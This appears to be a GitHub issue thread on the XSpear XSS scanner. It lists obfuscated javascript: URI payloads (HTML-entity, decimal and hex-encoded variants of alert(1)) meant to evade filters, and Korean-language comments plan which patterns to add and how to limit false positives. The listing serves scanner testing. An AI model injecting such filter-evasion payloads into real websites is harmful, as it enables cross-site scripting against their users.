Add pattern - Githubissues

hahwul commented 4 years ago

from nil

jav    ascript:alert(1)'

[ Html Entity(&name) ]

javascript&colon;alert(1)

[ Html Code(&#) ]

javascript&#0058;alert(1)
javascript&#0000058alert(1)
&#14; javascript:alert(1);

[ Hex Code(&#X) ]

javascript&#x003a;alert(1)
&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29'

여기서 검증할만한 것들만 추리자. 다만 event handler, 각종 src, href에 들어가는걸 걸러내서 탐지하지 않는 이상 오탐이 엄청 많을거임..

hahwul commented 4 years ago

우선은 a 태그 기준으로 넣어놓고, 각각 인코딩 방법에서 디코딩되서 노출되는지는 파라미터 분석에서 처리하자

hahwul commented 4 years ago

hahwul / XSpear